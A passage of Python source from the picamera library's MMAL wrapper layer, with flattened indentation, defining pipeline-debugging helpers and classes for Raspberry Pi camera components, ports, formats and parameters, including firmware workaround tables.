* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
under_comp = False
rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
rows[5].append('???')
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
rows[5].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
rows[5].append('colorspc')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return (
'<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate,
mmal.FOURCC_str(self.colorspace)))
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_colorspace(self):
return self._port[0].format[0].es[0].video.color_space
def _set_colorspace(self, value):
self._port[0].format[0].es[0].video.color_space = value
colorspace = property(_get_colorspace, _set_colorspace, doc="""\
Retrieves or sets the color-space of the port's frames.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
